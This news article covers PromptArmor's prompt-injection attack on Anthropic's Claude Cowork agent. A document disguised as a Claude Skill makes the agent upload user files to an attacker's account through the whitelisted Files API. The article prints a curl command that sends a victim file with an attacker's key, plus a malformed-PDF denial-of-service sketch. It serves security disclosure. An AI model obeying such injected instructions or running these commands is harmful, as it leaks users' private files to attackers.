AI Agent Can Access File Upload API to Exfiltrate Documents

Security researchers have demonstrated how Anthropic's new Claude Cowork productivity agent can be tricked into stealing user files and uploading them to an attacker's account, exploiting a vulnerability the company allegedly knew about but left unpatched for three months.
The vulnerability allows attackers to manipulate Cowork, through prompt injection, into uploading user files to an attacker's Anthropic account without requiring any additional approval from the victim. Security firm PromptArmor published a proof of concept showing how the attack works against the artificial intelligence agent.
The attack chain begins when a user connects Cowork to a local folder containing sensitive information. The user uploads a document that contains a hidden prompt injection. When Cowork analyzes the files, the injected prompt triggers automatically. PromptArmor demonstrated this using a scenario in which the malicious document posed as a Claude Skill, a type of instruction file users can upload to extend the AI's capabilities.
The injection instructs Claude to execute a curl command to Anthropic's file upload API using the attacker's API key rather than the victim's. Code executed by Claude runs in a virtual machine that blocks outbound network requests to nearly all domains, but the Anthropic API is whitelisted as trusted, allowing the attack to succeed.
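Based on that description, the injected instruction would drive Claude to run a request shaped roughly like the one below. This is a hypothetical dry-run sketch, not PromptArmor's actual payload: the command is built and printed rather than executed, the API key and file path are placeholders, and the endpoint and headers follow Anthropic's public Files API documentation.

```shell
# Hypothetical sketch of the exfiltration step described by PromptArmor.
# Because api.anthropic.com is whitelisted inside Cowork's VM, a request
# like this succeeds where other outbound domains would be blocked.
ATTACKER_API_KEY="sk-ant-placeholder"   # attacker-controlled key (placeholder)

# Build the command instead of executing it, to show the shape of the request.
EXFIL_CMD="curl -s https://api.anthropic.com/v1/files \
  -H 'x-api-key: ${ATTACKER_API_KEY}' \
  -H 'anthropic-version: 2023-06-01' \
  -H 'anthropic-beta: files-api-2025-04-14' \
  -F 'file=@/path/to/victim/document.pdf'"

echo "$EXFIL_CMD"
```

The key detail is the `x-api-key` header: because the upload authenticates as the attacker, the file lands in the attacker's account and is retrievable with their key, with no exfiltration visible on the victim's side.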
The vulnerability affects Claude Haiku and the company's flagship model, Claude Opus 4.5. PromptArmor demonstrated data exfiltration from Opus 4.5 when a simulated user uploaded a malicious integration guide while developing a new AI application. The firm said that prompt injection exploits architectural vulnerabilities rather than gaps in model intelligence, meaning that better reasoning provides no defense.
Security researcher Johann Rehberger first disclosed the Files API exfiltration vulnerability to Anthropic via HackerOne in October 2025. He said Anthropic closed the bug report an hour later, dismissing the issue as out of scope and classifying it as a model safety concern rather than a security vulnerability.
Rehberger said Anthropic contacted him again that month to say that data exfiltration vulnerabilities are in scope for reporting. But, he said, the company did not implement a fix. When Cowork launched on Jan. 13, nearly three months after the initial disclosure, the API was still vulnerable.
To mitigate the risks, Anthropic advised Cowork users to avoid connecting the tool to sensitive documents, limit its Chrome extension to trusted sites and monitor for suspicious actions that may indicate prompt injection. Developer Simon Willison, who reviewed Cowork, questioned the company's approach. "I don't think it's fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection,'" Willison said.
Anthropic said that Cowork was launched as a research preview with unique risks owing to its agentic nature and internet access. The company plans to ship an update to the Cowork virtual machine to improve its interaction with the vulnerable API, and said other security improvements will follow.
PromptArmor researchers also discovered that Claude's API struggles when a file does not match the type it claims to be. When operating on a malformed PDF that is actually a text file, Claude throws API errors in every subsequent chat in the conversation. Researchers said this failure could potentially be exploited through indirect prompt injection to cause a limited denial-of-service attack.
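The mismatch described here is trivial to construct: a file carrying a .pdf extension but plain-text contents lacks the `%PDF-` magic bytes every genuine PDF begins with. A minimal illustration (not PromptArmor's actual test file):

```shell
# Create a "PDF" that is actually plain text -- the type mismatch that,
# per PromptArmor, leaves Claude's API throwing errors in later chats.
printf 'just plain text, no PDF structure here\n' > malformed.pdf

# A genuine PDF starts with the magic bytes "%PDF-"; this file does not,
# so any consumer that trusts the extension over the contents will choke.
head -c 5 malformed.pdf
```

Because the error reportedly persists across subsequent chats in the same conversation, an attacker who can induce the agent to touch such a file once could degrade the session indefinitely.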
The broader implications of the vulnerability extend beyond file exfiltration. Cowork was designed to interact with a user's entire work environment, including browsers and Model Context Protocol servers that grant capabilities such as sending texts or controlling a Mac with AppleScript. These capabilities increase the chance that the model will process sensitive and untrusted data sources that users don't manually review for injections, creating what PromptArmor describes as an ever-growing attack surface.









